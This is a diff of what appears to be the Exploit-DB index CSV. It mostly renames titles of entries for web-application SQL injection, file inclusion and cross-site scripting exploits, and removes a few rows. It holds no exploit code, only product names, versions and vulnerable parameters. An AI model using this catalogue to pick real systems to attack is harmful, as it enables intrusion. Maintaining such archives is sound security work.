+5125,platforms/php/webapps/5125.txt,"PHP Live! 3.2.2 - 'questid' Parameter SQL Injection (1)",2008-02-14,Xar,php,webapps,0
 5126,platforms/php/webapps/5126.txt,"WordPress Plugin Simple Forum 2.0 < 2.1 - SQL Injection",2008-02-15,S@BUN,php,webapps,0
 5127,platforms/php/webapps/5127.txt,"WordPress Plugin Simple Forum 1.10 < 1.11 - SQL Injection",2008-02-15,S@BUN,php,webapps,0
-5128,platforms/php/webapps/5128.txt,"Mambo Component Quran 1.1 - (surano) SQL Injection",2008-02-15,Don,php,webapps,0
+5128,platforms/php/webapps/5128.txt,"Mambo Component Quran 1.1 - 'surano' Parameter SQL Injection",2008-02-15,Don,php,webapps,0
 5129,platforms/php/webapps/5129.txt,"TRUC 0.11.0 - 'download.php' Remote File Disclosure",2008-02-16,GoLd_M,php,webapps,0
 5130,platforms/php/webapps/5130.txt,"AuraCMS 1.62 - Multiple SQL Injections",2008-02-16,NTOS-Team,php,webapps,0
-5131,platforms/php/webapps/5131.pl,"Simple CMS 1.0.3 - (indexen.php area) SQL Injection",2008-02-16,JosS,php,webapps,0
+5131,platforms/php/webapps/5131.pl,"Simple CMS 1.0.3 - 'area' Parameter SQL Injection",2008-02-16,JosS,php,webapps,0
 5132,platforms/php/webapps/5132.txt,"Joomla! Component jooget 2.6.8 - SQL Injection",2008-02-16,S@BUN,php,webapps,0
 5133,platforms/php/webapps/5133.txt,"Mambo Component Ricette 1.0 - SQL Injection",2008-02-16,S@BUN,php,webapps,0
 5134,platforms/php/webapps/5134.txt,"Joomla! Component com_galeria - SQL Injection",2008-02-16,S@BUN,php,webapps,0
 5135,platforms/php/webapps/5135.txt,"WordPress Plugin Photo album - SQL Injection",2008-02-16,S@BUN,php,webapps,0
 5136,platforms/php/webapps/5136.txt,"PHPizabi 0.848b C1 HFP1 - Arbitrary File Upload",2008-02-17,ZoRLu,php,webapps,0
-5137,platforms/php/webapps/5137.txt,"XPWeb 3.3.2 - (download.php url) Remote File Disclosure",2008-02-17,GoLd_M,php,webapps,0
+5137,platforms/php/webapps/5137.txt,"XPWeb 3.3.2 - 'url' Parameter Remote File Disclosure",2008-02-17,GoLd_M,php,webapps,0
 5138,platforms/php/webapps/5138.txt,"Joomla! Component astatsPRO 1.0 - refer.php SQL Injection",2008-02-18,ka0x,php,webapps,0
 5139,platforms/php/webapps/5139.txt,"Mambo Component 'com_portfolio' 1.0 - 'categoryId' SQL Injection",2008-02-18,"it's my",php,webapps,0
 5140,platforms/php/webapps/5140.txt,"LightBlog 9.6 - 'Username' Parameter Local File Inclusion",2008-02-18,muuratsalo,php,webapps,0
-5145,platforms/php/webapps/5145.txt,"Joomla! Component com_pccookbook - (user_id) SQL Injection",2008-02-18,S@BUN,php,webapps,0
+5145,platforms/php/webapps/5145.txt,"Joomla! Component com_pccookbook - 'user_id' Parameter SQL Injection",2008-02-18,S@BUN,php,webapps,0
-5146,platforms/php/webapps/5146.txt,"Joomla! Component com_clasifier - 'cat_id' SQL Injection",2008-02-18,S@BUN,php,webapps,0
+5146,platforms/php/webapps/5146.txt,"Joomla! Component com_clasifier - 'cat_id' Parameter SQL Injection",2008-02-18,S@BUN,php,webapps,0
-5147,platforms/php/webapps/5147.txt,"PHP-Nuke Module books SQL - 'cid' SQL Injection",2008-02-18,S@BUN,php,webapps,0
+5147,platforms/php/webapps/5147.txt,"PHP-Nuke Module books SQL - 'cid' Parameter SQL Injection",2008-02-18,S@BUN,php,webapps,0
-5148,platforms/php/webapps/5148.txt,"XOOPS Module myTopics - 'articleId' SQL Injection",2008-02-18,S@BUN,php,webapps,0
+5148,platforms/php/webapps/5148.txt,"XOOPS Module myTopics - 'articleId' Parameter SQL Injection",2008-02-18,S@BUN,php,webapps,0
 5149,platforms/php/webapps/5149.txt,"sCssBoard - (pwnpack) Multiple Versions Remote Exploit",2008-02-18,Inphex,php,webapps,0
-5154,platforms/php/webapps/5154.txt,"PHP-Nuke Module Sections - (artid) SQL Injection",2008-02-19,S@BUN,php,webapps,0
+5154,platforms/php/webapps/5154.txt,"PHP-Nuke Module Sections - 'artid' Parameter SQL Injection",2008-02-19,S@BUN,php,webapps,0
-5155,platforms/php/webapps/5155.txt,"PHP-Nuke Module EasyContent - (page_id) SQL Injection",2008-02-19,"Mehmet Ince",php,webapps,0
+5155,platforms/php/webapps/5155.txt,"PHP-Nuke Module EasyContent - 'page_id' Parameter SQL Injection",2008-02-19,"Mehmet Ince",php,webapps,0
-5156,platforms/php/webapps/5156.txt,"RunCMS Module MyAnnonces - 'cid' SQL Injection",2008-02-19,S@BUN,php,webapps,0
+5156,platforms/php/webapps/5156.txt,"RunCMS Module MyAnnonces - 'cid' Parameter SQL Injection",2008-02-19,S@BUN,php,webapps,0
-5157,platforms/php/webapps/5157.txt,"XOOPS Module eEmpregos - 'cid' SQL Injection",2008-02-19,S@BUN,php,webapps,0
+5157,platforms/php/webapps/5157.txt,"XOOPS Module eEmpregos - 'cid' Parameter SQL Injection",2008-02-19,S@BUN,php,webapps,0
-5158,platforms/php/webapps/5158.txt,"XOOPS Module Classifieds - 'cid' SQL Injection",2008-02-19,S@BUN,php,webapps,0
+5158,platforms/php/webapps/5158.txt,"XOOPS Module Classifieds - 'cid' Parameter SQL Injection",2008-02-19,S@BUN,php,webapps,0
-5159,platforms/php/webapps/5159.txt,"PHP-Nuke Modules Okul 1.0 - (okulid) SQL Injection",2008-02-20,"Mehmet Ince",php,webapps,0
+5159,platforms/php/webapps/5159.txt,"PHP-Nuke Modules Okul 1.0 - 'okulid' Parameter SQL Injection",2008-02-20,"Mehmet Ince",php,webapps,0
-5160,platforms/php/webapps/5160.txt,"Joomla! Component com_hwdvideoshare - SQL Injection",2008-02-20,S@BUN,php,webapps,0
+5160,platforms/php/webapps/5160.txt,"Joomla! Component Highwood Design hwdVideoShare - SQL Injection",2008-02-20,S@BUN,php,webapps,0
-5161,platforms/php/webapps/5161.txt,"PHP-Nuke Module Docum - (artid) SQL Injection",2008-02-20,DamaR,php,webapps,0
+5161,platforms/php/webapps/5161.txt,"PHP-Nuke Module Docum - 'artid' Parameter SQL Injection",2008-02-20,DamaR,php,webapps,0
-5162,platforms/php/webapps/5162.txt,"Globsy 1.0 - (file) Remote File Disclosure",2008-02-20,GoLd_M,php,webapps,0
+5162,platforms/php/webapps/5162.txt,"Globsy 1.0 - 'file' Parameter Remote File Disclosure",2008-02-20,GoLd_M,php,webapps,0
-5163,platforms/php/webapps/5163.txt,"PHP-Nuke Module Inhalt - 'cid' SQL Injection",2008-02-20,Crackers_Child,php,webapps,0
+5163,platforms/php/webapps/5163.txt,"PHP-Nuke Module Inhalt - 'cid' Parameter SQL Injection",2008-02-20,Crackers_Child,php,webapps,0
 5164,platforms/php/webapps/5164.php,"Woltlab Burning Board 3.0.x - Blind SQL Injection",2008-02-20,NBBN,php,webapps,0
 5165,platforms/php/webapps/5165.php,"PunBB 1.2.16 - Blind Password Recovery Exploit",2008-02-21,EpiBite,php,webapps,0
 5166,platforms/php/webapps/5166.htm,"MultiCart 2.0 - (productdetails.php) SQL Injection",2008-02-20,t0pP8uZz,php,webapps,0
@@ -18582,7 +18581,7 @@ id,file,description,date,author,platform,type,port
 5510,platforms/php/webapps/5510.txt,"Content Management System for Phprojekt 0.6.1 - File Disclosure",2008-04-27,Houssamix,php,webapps,0
 5512,platforms/php/webapps/5512.pl,"Joomla! Component com_alphacontent - Blind SQL Injection",2008-04-27,cO2,php,webapps,0
 5513,platforms/php/webapps/5513.pl,"ODFaq 2.1.0 - Blind SQL Injection",2008-04-27,cO2,php,webapps,0
-5514,platforms/php/webapps/5514.pl,"Joomla! Component paxxgallery 0.2 - (gid) Blind SQL Injection",2008-04-27,ZAMUT,php,webapps,0
+5514,platforms/php/webapps/5514.pl,"Joomla! Component paxxgallery 0.2 - 'gid' Parameter Blind SQL Injection",2008-04-27,ZAMUT,php,webapps,0
 5516,platforms/php/webapps/5516.txt,"Prozilla Hosting Index - 'Directory.php cat_id' SQL Injection",2008-04-28,K-159,php,webapps,0
 5517,platforms/php/webapps/5517.txt,"Softbiz Web Host Directory Script (host_id) - SQL Injection",2008-04-28,K-159,php,webapps,0
 5520,platforms/php/webapps/5520.txt,"Joovili 3.1 - (browse.videos.php category) SQL Injection",2008-04-28,HaCkeR_EgY,php,webapps,0
@@ -19747,7 +19746,7 @@ id,file,description,date,author,platform,type,port
 7001,platforms/php/webapps/7001.txt,"DFLabs PTK 1.0 - Local Command Execution",2008-11-05,ikki,php,webapps,0
 7002,platforms/php/webapps/7002.txt,"Joomla! Component Dada Mail Manager 2.6 - Remote File Inclusion",2008-11-05,NoGe,php,webapps,0
 7003,platforms/php/webapps/7003.txt,"PHP Auto Listings - 'moreinfo.php pg' SQL Injection",2008-11-05,G4N0K,php,webapps,0
-7004,platforms/php/webapps/7004.txt,"Pre Simple CMS - (Authentication Bypass) SQL Injection",2008-11-05,"Hussin X",php,webapps,0
+7004,platforms/php/webapps/7004.txt,"Pre Simple CMS - SQL Injection (Authentication Bypass)",2008-11-05,"Hussin X",php,webapps,0
 7005,platforms/php/webapps/7005.txt,"PHP JOBWEBSITE PRO - (Authentication Bypass) SQL Injection",2008-11-05,Cyber-Zone,php,webapps,0
 7007,platforms/php/webapps/7007.txt,"Harlandscripts drinks - (recid) SQL Injection",2008-11-05,"Ex Tacy",php,webapps,0
 7008,platforms/php/webapps/7008.txt,"Pre Real Estate Listings - (Authentication Bypass) SQL Injection",2008-11-05,Cyber-Zone,php,webapps,0
@@ -20371,7 +20370,7 @@ id,file,description,date,author,platform,type,port
 7819,platforms/php/webapps/7819.txt,"ESPG (Enhanced Simple PHP Gallery) 1.72 - File Disclosure",2009-01-18,bd0rk,php,webapps,0
 7820,platforms/php/webapps/7820.pl,"Fhimage 1.2.1 - Remote Index Change Exploit",2009-01-19,Osirys,php,webapps,0
 7821,platforms/php/webapps/7821.pl,"Fhimage 1.2.1 - Remote Command Execution (mq = off)",2009-01-19,Osirys,php,webapps,0
-7824,platforms/php/webapps/7824.pl,"Joomla! Component com_pccookbook - (recipe_id) Blind SQL Injection",2009-01-19,InjEctOr5,php,webapps,0
+7824,platforms/php/webapps/7824.pl,"Joomla! Component com_pccookbook - 'recipe_id' Parameter Blind SQL Injection",2009-01-19,InjEctOr5,php,webapps,0
 7828,platforms/php/webapps/7828.txt,"Joomla! Component com_news - SQL Injection",2009-01-19,snakespc,php,webapps,0
 7829,platforms/php/webapps/7829.txt,"Gallery Kys 1.0 - Admin Password Disclosure / Permanent Cross-Site Scripting",2009-01-19,Osirys,php,webapps,0
 7830,platforms/php/webapps/7830.txt,"RCBlog 1.03 - Authentication Bypass",2009-01-19,"Danny Moules",php,webapps,0
@@ -21178,7 +21177,7 @@ id,file,description,date,author,platform,type,port
 9165,platforms/php/webapps/9165.pl,"webLeague 2.2.0 - (Authentication Bypass) SQL Injection",2009-07-16,ka0x,php,webapps,0
 9166,platforms/php/webapps/9166.txt,"ZenPhoto Gallery 1.2.5 - Admin Password Reset (CRSF)",2009-07-16,petros,php,webapps,0
 9171,platforms/php/webapps/9171.txt,"VS PANEL 7.5.5 - (results.php Cat_ID) SQL Injection",2009-07-16,C0D3R-Dz,php,webapps,0
-9174,platforms/php/webapps/9174.txt,"PHP Live! 3.2.1/2 - '&x=' Blind SQL Injection",2009-07-16,boom3rang,php,webapps,0
+9174,platforms/php/webapps/9174.txt,"PHP Live! 3.2.1/2 - 'x' Parameter Blind SQL Injection",2009-07-16,boom3rang,php,webapps,0
 9176,platforms/php/webapps/9176.txt,"dB Masters MultiMedia's Content Manager 4.5 - SQL Injection",2009-07-16,NoGe,php,webapps,0
 9179,platforms/php/webapps/9179.txt,"Super Simple Blog Script 2.5.4 - Local File Inclusion",2009-07-17,JIKO,php,webapps,0
 9180,platforms/php/webapps/9180.txt,"Super Simple Blog Script 2.5.4 - (entry) SQL Injection",2009-07-17,JIKO,php,webapps,0
@@ -21215,7 +21214,7 @@ id,file,description,date,author,platform,type,port
 9250,platforms/php/webapps/9250.sh,"WordPress 2.8.1 - (url) Cross-Site Scripting",2009-07-24,superfreakaz0rz,php,webapps,0
 9251,platforms/php/webapps/9251.txt,"Deonixscripts Templates Management 1.3 - SQL Injection",2009-07-24,d3b4g,php,webapps,0
 9252,platforms/php/webapps/9252.txt,"Scripteen Free Image Hosting Script 2.3 - SQL Injection",2009-07-24,Coksnuss,php,webapps,0
-9254,platforms/php/webapps/9254.txt,"PHP Live! 3.2.2 - (questid) SQL Injection (2)",2009-07-24,skys,php,webapps,0
+9254,platforms/php/webapps/9254.txt,"PHP Live! 3.2.2 - 'questid' Parameter SQL Injection (2)",2009-07-24,skys,php,webapps,0
 9255,platforms/php/webapps/9255.txt,"Clip Bucket 1.7.1 - Insecure Cookie Handling",2009-07-24,Qabandi,php,webapps,0
 9256,platforms/php/webapps/9256.txt,"Scripteen Free Image Hosting Script 2.3 - Insecure Cookie Handling",2009-07-24,Qabandi,php,webapps,0
 9257,platforms/php/webapps/9257.php,"Pixaria Gallery 2.3.5 - (file) Remote File Disclosure",2009-07-24,Qabandi,php,webapps,0
@@ -21235,7 +21234,7 @@ id,file,description,date,author,platform,type,port
 9275,platforms/php/webapps/9275.php,"Allomani Movies & Clips 2.7.0 - Blind SQL Injection",2009-07-27,Qabandi,php,webapps,0
 9276,platforms/php/webapps/9276.txt,"Joomla! Component IXXO Cart! Standalone and - SQL Injection",2009-07-27,sm0k3,php,webapps,0
 9279,platforms/php/webapps/9279.pl,"PunBB Automatic Image Upload 1.3.5 - SQL Injection",2009-07-27,Dante90,php,webapps,0
-9280,platforms/php/webapps/9280.pl,"PunBB Automatic Image Upload 1.3.5 - Delete Arbitrary File Exploit",2009-07-27,Dante90,php,webapps,0
+9280,platforms/php/webapps/9280.pl,"PunBB Automatic Image Upload 1.3.5 - Arbitrary File Delete",2009-07-27,Dante90,php,webapps,0
 9281,platforms/php/webapps/9281.txt,"Limny 1.01 - (Authentication Bypass) SQL Injection",2009-07-27,SirGod,php,webapps,0
 9282,platforms/php/webapps/9282.txt,"Magician Blog 1.0 - (ids) SQL Injection",2009-07-27,Evil-Cod3r,php,webapps,0
 9283,platforms/php/webapps/9283.txt,"Magician Blog 1.0 - (Authentication Bypass) SQL Injection",2009-07-27,Evil-Cod3r,php,webapps,0
@@ -21255,7 +21254,7 @@ id,file,description,date,author,platform,type,port
 9310,platforms/php/webapps/9310.txt,"dit.cms 1.3 - (path/sitemap/relPath) Local File Inclusion",2009-07-30,SirGod,php,webapps,0
 9311,platforms/php/webapps/9311.txt,"cmsphp 0.21 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2009-07-30,SirGod,php,webapps,0
 9312,platforms/php/webapps/9312.txt,"d.net CMS - (Local File Inclusion / SQL Injection) Multiple Vulnerabilities",2009-07-30,SirGod,php,webapps,0
-9313,platforms/php/webapps/9313.txt,"Really Simple CMS 0.3a - (pagecontent.php PT) Local File Inclusion",2009-07-30,SirGod,php,webapps,0
+9313,platforms/php/webapps/9313.txt,"Really Simple CMS 0.3a - 'PT' Parameter Local File Inclusion",2009-07-30,SirGod,php,webapps,0
 9314,platforms/php/webapps/9314.txt,"MUJE CMS 1.0.4.34 - Local File Inclusion",2009-07-30,SirGod,php,webapps,0
 9315,platforms/php/webapps/9315.pl,"PunBB Reputation.php Mod 2.0.4 - Local File Inclusion",2009-07-30,Dante90,php,webapps,0
 9316,platforms/php/webapps/9316.txt,"linkSpheric 0.74b6 - (listID) SQL Injection",2009-07-30,NoGe,php,webapps,0
@@ -21373,7 +21372,7 @@ id,file,description,date,author,platform,type,port
 9523,platforms/php/webapps/9523.txt,"Moa Gallery 1.2.0 - (index.php action) SQL Injection",2009-08-26,Mr.SQL,php,webapps,0
 9524,platforms/php/webapps/9524.txt,"totalcalendar 2.4 - (Blind SQL Injection / Local File Inclusion) Multiple Vulnerabilities",2009-08-26,Moudi,php,webapps,0
 9525,platforms/php/webapps/9525.txt,"Moa Gallery 1.2.0 - (p_filename) Remote File Disclosure",2009-08-26,GoLd_M,php,webapps,0
-9527,platforms/php/webapps/9527.txt,"Simple CMS Framework 1.0 - (page) SQL Injection",2009-08-26,Red-D3v1L,php,webapps,0
+9527,platforms/php/webapps/9527.txt,"Simple CMS Framework 1.0 - 'page' Parameter SQL Injection",2009-08-26,Red-D3v1L,php,webapps,0
 9529,platforms/php/webapps/9529.txt,"Discuz! Plugin Crazy Star 2.0 - (fmid) SQL Injection",2009-08-26,ZhaoHuAn,php,webapps,0
 9530,platforms/php/webapps/9530.txt,"open auto Classifieds 1.5.9 - Multiple Vulnerabilities",2009-08-26,"Andrew Horton",php,webapps,0
 9531,platforms/php/webapps/9531.txt,"PAD Site Scripts 3.6 - (list.php string) SQL Injection",2009-08-26,Mr.SQL,php,webapps,0
@@ -21398,7 +21397,7 @@ id,file,description,date,author,platform,type,port
 9572,platforms/php/webapps/9572.txt,"DataLife Engine 8.2 - dle_config_api Remote File Inclusion",2009-09-01,Kurd-Team,php,webapps,0
 9576,platforms/php/webapps/9576.txt,"Discuz! Plugin JiangHu 1.1 - 'id' SQL Injection",2009-09-02,ZhaoHuAn,php,webapps,0
 9577,platforms/php/webapps/9577.txt,"Ve-EDIT 0.1.4 - (highlighter) Remote File Inclusion",2009-09-02,RoMaNcYxHaCkEr,php,webapps,0
-9578,platforms/php/webapps/9578.txt,"PHP Live! 3.3 - (deptid) SQL Injection",2009-09-02,v3n0m,php,webapps,0
+9578,platforms/php/webapps/9578.txt,"PHP Live! 3.3 - 'deptid' Parameter SQL Injection",2009-09-02,v3n0m,php,webapps,0
 9582,platforms/php/webapps/9582.txt,"FreeSchool 1.1.0 - Multiple Remote File Inclusion",2009-09-03,cr4wl3r,php,webapps,0
 9583,platforms/php/webapps/9583.txt,"PHPope 1.0.0 - Multiple Remote File Inclusion",2009-09-03,cr4wl3r,php,webapps,0
 9588,platforms/php/webapps/9588.txt,"Mambo Component com_zoom - 'catid' Blind SQL Injection",2009-09-04,boom3rang,php,webapps,0
@@ -23563,7 +23562,7 @@ id,file,description,date,author,platform,type,port
 14331,platforms/php/webapps/14331.html,"TomatoCMS 2.0.5 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-07-11,10n1z3d,php,webapps,0
 14336,platforms/php/webapps/14336.txt,"Joomla! Component 'EasyBlog' - Persistent Cross-Site Scripting",2010-07-12,Sid3^effects,php,webapps,0
 14337,platforms/php/webapps/14337.html,"TheHostingTool 1.2.2 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-07-12,10n1z3d,php,webapps,0
-14338,platforms/php/webapps/14338.html,"Getsimple CMS 2.01 - (Cross-Site Scripting / Cross-Site Request Forgery) Multiple Vulnerabilities",2010-07-12,10n1z3d,php,webapps,0
+14338,platforms/php/webapps/14338.html,"Getsimple CMS 2.01 - Multiple Vulnerabilities",2010-07-12,10n1z3d,php,webapps,0
 14342,platforms/php/webapps/14342.html,"Grafik CMS 1.1.2 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-07-12,10n1z3d,php,webapps,0
 14355,platforms/windows/webapps/14355.txt,"dotDefender 4.02 - Authentication Bypass",2010-07-13,"David K",windows,webapps,0
 14350,platforms/php/webapps/14350.txt,"Joomla! Component 'com_qcontacts' - SQL Injection",2010-07-13,_mlk_,php,webapps,0
@@ -24889,7 +24888,7 @@ id,file,description,date,author,platform,type,port
 17987,platforms/php/webapps/17987.txt,"WordPress Plugin BackWPUp 2.1.4 - Code Execution",2011-10-17,"Sense of Security",php,webapps,0
 17994,platforms/php/webapps/17994.php,"Dolphin 7.0.7 - (member_menu_queries.php) Remote PHP Code Injection",2011-10-18,EgiX,php,webapps,0
 17989,platforms/php/webapps/17989.txt,"Dominant Creature BBG/RPG Browser Game - Persistent Cross-Site Scripting",2011-10-17,M.Jock3R,php,webapps,0
-17992,platforms/php/webapps/17992.txt,"GNUBoard 4.33.02 - tp.php PATH_INFO SQL Injection",2011-10-17,flyh4t,php,webapps,0
+17992,platforms/php/webapps/17992.txt,"GNUBoard 4.33.02 - 'tp.php' PATH_INFO SQL Injection",2011-10-17,flyh4t,php,webapps,0
 17995,platforms/php/webapps/17995.txt,"Joomla! Plugin NoNumber Framework - Multiple Vulnerabilities",2011-10-18,jdc,php,webapps,0
 17997,platforms/php/webapps/17997.txt,"Yet Another CMS 1.0 - SQL Injection / Cross-Site Scripting",2011-10-19,"Stefan Schurtz",php,webapps,0
 17998,platforms/php/webapps/17998.txt,"Openemr-4.1.0 - SQL Injection",2011-10-19,"I2sec-dae jin Oh",php,webapps,0
@@ -27194,7 +27193,6 @@ id,file,description,date,author,platform,type,port
 25178,platforms/php/webapps/25178.txt,"427BB 2.x - Multiple Remote HTML Injection Vulnerabilities",2005-03-01,"Hackerlounge Research Group",php,webapps,0
 25179,platforms/php/webapps/25179.txt,"PBLang Bulletin Board System 4.x - DelPM.php Arbitrary Personal Message Deletion",2005-03-01,Raven,php,webapps,0
 25180,platforms/php/webapps/25180.py,"PHPNews 1.2.3/1.2.4 - auth.php Remote File Inclusion",2005-03-01,mozako,php,webapps,0
-25182,platforms/php/webapps/25182.txt,"auraCMS 1.5 - Multiple Cross-Site Scripting Vulnerabilities",2005-03-02,"echo staff",php,webapps,0
 25197,platforms/php/webapps/25197.txt,"PHP-Fusion 5.0 - BBCode IMG Tag Script Injection",2005-03-08,FireSt0rm,php,webapps,0
 25198,platforms/jsp/webapps/25198.txt,"OutStart Participate Enterprise 3 - Multiple Access Validation Vulnerabilities",2005-03-08,Altrus,jsp,webapps,0
 25199,platforms/php/webapps/25199.txt,"YaBB 2.0 - Remote UsersRecentPosts Cross-Site Scripting",2005-03-08,trueend5,php,webapps,0
@@ -27765,7 +27763,7 @@ id,file,description,date,author,platform,type,port
 25954,platforms/php/webapps/25954.txt,"phpAuction 2.5 - Multiple Vulnerabilities",2005-07-07,Dcrab,php,webapps,0
 25955,platforms/php/webapps/25955.txt,"PhotoGal 1.0/1.5 - News_File Remote File Inclusion",2005-07-07,"skdaemon porra",php,webapps,0
 25956,platforms/asp/webapps/25956.txt,"Comersus Open Technologies Comersus Cart 6.0.41 - Multiple Cross-Site Scripting Vulnerabilities",2005-07-07,"Diabolic Crab",asp,webapps,0
-25957,platforms/php/webapps/25957.txt,"PunBB 1.x - profile.php User Profile Edit Module SQL Injection",2005-07-08,"Stefan Esser",php,webapps,0
+25957,platforms/php/webapps/25957.txt,"PunBB 1.x - 'profile.php' User Profile Edit Module SQL Injection",2005-07-08,"Stefan Esser",php,webapps,0
 25958,platforms/php/webapps/25958.txt,"ID Team ID Board 1.1.3 - SQL.CLS.php SQL Injection",2005-07-10,Defa,php,webapps,0
 25959,platforms/php/webapps/25959.txt,"Spid 1.3 - lang_path File Inclusion",2005-07-11,"skdaemon porra",php,webapps,0
 25960,platforms/php/webapps/25960.txt,"PPA 0.5.6 - ppa_root_path File Inclusion",2005-07-10,"skdaemon porra",php,webapps,0
@@ -28052,7 +28050,7 @@ id,file,description,date,author,platform,type,port
 26347,platforms/php/webapps/26347.txt,"Gallery 2.0 - main.php Directory Traversal",2005-10-14,"Michael Dipper",php,webapps,0
 26348,platforms/php/webapps/26348.txt,"Complete PHP Counter - SQL Injection",2005-10-14,BiPi_HaCk,php,webapps,0
 26349,platforms/php/webapps/26349.txt,"Complete PHP - Counter Cross-Site Scripting",2005-10-14,BiPi_HaCk,php,webapps,0
-26350,platforms/php/webapps/26350.txt,"PunBB 1.2.x - search.php SQL Injection",2005-10-15,Devil_box,php,webapps,0
+26350,platforms/php/webapps/26350.txt,"PunBB 1.2.x - 'search.php' SQL Injection",2005-10-15,Devil_box,php,webapps,0
 26351,platforms/asp/webapps/26351.txt,"Comersus Backoffice Plus - Multiple Cross-Site Scripting Vulnerabilities",2005-10-17,Lostmon,asp,webapps,0
 26354,platforms/jsp/webapps/26354.txt,"NetFlow Analyzer 4 - Cross-Site Scripting",2005-10-18,why@nsfocus.com,jsp,webapps,0
 26355,platforms/php/webapps/26355.txt,"MySource 2.14 - upgrade_in_progress_backend.php target_url Parameter Cross-Site Scripting",2005-10-18,"Secunia Research",php,webapps,0
@@ -28924,7 +28922,6 @@ id,file,description,date,author,platform,type,port
 27449,platforms/php/webapps/27449.txt,"phpWebSite 0.8.2/0.8.3 - article.php sid Parameter SQL Injection",2006-03-20,DaBDouB-MoSiKaR,php,webapps,0
 27450,platforms/php/webapps/27450.txt,"WinHKI 1.4/1.5/1.6 - Directory Traversal",2006-02-24,raphael.huck@free.fr,php,webapps,0
 27451,platforms/cgi/webapps/27451.txt,"Verisign MPKI 6.0 - Haydn.exe Cross-Site Scripting",2006-03-20,"Alberto Soli",cgi,webapps,0
-27453,platforms/php/webapps/27453.txt,"PHP Live! 3.0 - Status_Image.php Cross-Site Scripting",2006-03-22,kspecial,php,webapps,0
 27454,platforms/php/webapps/27454.txt,"Motorola - BlueTooth Interface Dialog Spoofing",2006-03-22,kspecial,php,webapps,0
 27455,platforms/cfm/webapps/27455.txt,"1WebCalendar 4.0 - viewEvent.cfm EventID Parameter SQL Injection",2006-03-22,r0t3d3Vil,cfm,webapps,0
 27456,platforms/cfm/webapps/27456.txt,"1WebCalendar 4.0 - /news/newsView.cfm NewsID Parameter SQL Injection",2006-03-22,r0t3d3Vil,cfm,webapps,0
@@ -29239,7 +29236,6 @@ id,file,description,date,author,platform,type,port
 27854,platforms/cfm/webapps/27854.txt,"Cartweaver 2.16.11 - Details.cfm ProdID Parameter SQL Injection",2006-04-25,r0t,cfm,webapps,0
 27858,platforms/php/webapps/27858.txt,"phpBB Chart Mod 1.1 - charts.php id Parameter Cross-Site Scripting",2006-05-11,sn4k3.23,php,webapps,0
 27859,platforms/php/webapps/27859.txt,"OZJournals 1.2 - 'Vname' Parameter Cross-Site Scripting",2006-05-12,Kiki,php,webapps,0
-27860,platforms/php/webapps/27860.txt,"PHP Live Helper 2.0 - chat.php Cross-Site Scripting",2006-05-12,Mr-X,php,webapps,0
 27863,platforms/php/webapps/27863.txt,"phpBB 2.0.20 - Unauthorized HTTP Proxy",2006-05-12,rgod,php,webapps,0
 27864,platforms/php/webapps/27864.txt,"Gphotos 1.4/1.5 - 'index.php' rep Parameter Cross-Site Scripting",2006-05-13,"Morocco Security Team",php,webapps,0
 27865,platforms/php/webapps/27865.txt,"Gphotos 1.4/1.5 - diapo.php rep Parameter Cross-Site Scripting",2006-05-13,"Morocco Security Team",php,webapps,0
@@ -30293,9 +30289,6 @@ id,file,description,date,author,platform,type,port
 29336,platforms/asp/webapps/29336.txt,"Chatwm 1.0 - SelGruFra.asp SQL Injection",2006-12-24,ShaFuq31,asp,webapps,0
 29337,platforms/php/webapps/29337.txt,"TimberWolf 1.2.2 - shownews.php Cross-Site Scripting",2006-12-24,CorryL,php,webapps,0
 29338,platforms/php/webapps/29338.txt,"vBulletin 3.5.x/3.6.x - SWF Script Injection",2006-12-25,"Ashraf Morad",php,webapps,0
-29339,platforms/php/webapps/29339.txt,"PHP Live! 3.2.2 - setup/transcripts.php search_string Parameter Cross-Site Scripting",2006-12-25,"Hackers Center Security",php,webapps,0
-29340,platforms/php/webapps/29340.txt,"PHP Live! 3.2.2 - 'index.php' l Parameter Cross-Site Scripting",2006-12-25,"Hackers Center Security",php,webapps,0
-29341,platforms/php/webapps/29341.txt,"PHP Live! 3.2.2 - PHPlive/message_box.php Multiple Parameter Cross-Site Scripting",2006-12-25,"Hackers Center Security",php,webapps,0
 29342,platforms/php/webapps/29342.txt,"Luckybot 3 - DIR Parameter Multiple Remote File Inclusion",2006-12-26,Red_Casper,php,webapps,0
 29343,platforms/php/webapps/29343.txt,"phpCMS 1.1.7 - 'counter.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
 29344,platforms/php/webapps/29344.txt,"phpCMS 1.1.7 - 'parser.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0
@@ -31429,8 +31422,6 @@ id,file,description,date,author,platform,type,port
 31145,platforms/php/webapps/31145.txt,"Easy POS System - SQL Injection (login.php)",2014-01-23,vinicius777,php,webapps,0
 31146,platforms/php/webapps/31146.txt,"Cells Blog 3.3 - Reflected Cross-Site Scripting / Blind SQLite Injection",2014-01-23,vinicius777,php,webapps,0
 31147,platforms/php/webapps/31147.txt,"Adult WebMaster PHP - Password Disclosure",2014-01-23,vinicius777,php,webapps,0
-31152,platforms/php/webapps/31152.txt,"artmedic weblog - artmedic_print.php date Parameter Cross-Site Scripting",2008-02-12,muuratsalo,php,webapps,0
-31153,platforms/php/webapps/31153.txt,"artmedic weblog - 'index.php' jahrneu Parameter Cross-Site Scripting",2008-02-12,muuratsalo,php,webapps,0
 31154,platforms/php/webapps/31154.txt,"Counter Strike Portals - 'download' SQL Injection",2008-02-12,S@BUN,php,webapps,0
 31155,platforms/php/webapps/31155.txt,"Joomla! / Mambo Component 'com_iomezun' - 'id' Parameter SQL Injection",2008-02-12,S@BUN,php,webapps,0
 31156,platforms/php/webapps/31156.txt,"Cacti 0.8.7 - graph_view.php graph_list Parameter SQL Injection",2008-02-12,aScii,php,webapps,0
@@ -32252,7 +32243,6 @@ id,file,description,date,author,platform,type,port
 32342,platforms/php/webapps/32342.txt,"eXtrovert software Thyme 1.3 - 'pick_users.php' SQL Injection",2008-09-08,"Omer Singer",php,webapps,0
 32346,platforms/php/webapps/32346.txt,"E-PHP B2B Trading Marketplace Script - 'listings.php' SQL Injection",2008-09-07,r45c4l,php,webapps,0
 32347,platforms/php/webapps/32347.txt,"UBB.Threads 7.3.1 - 'Forum[]' Array SQL Injection",2008-09-02,"James Bercegay",php,webapps,0
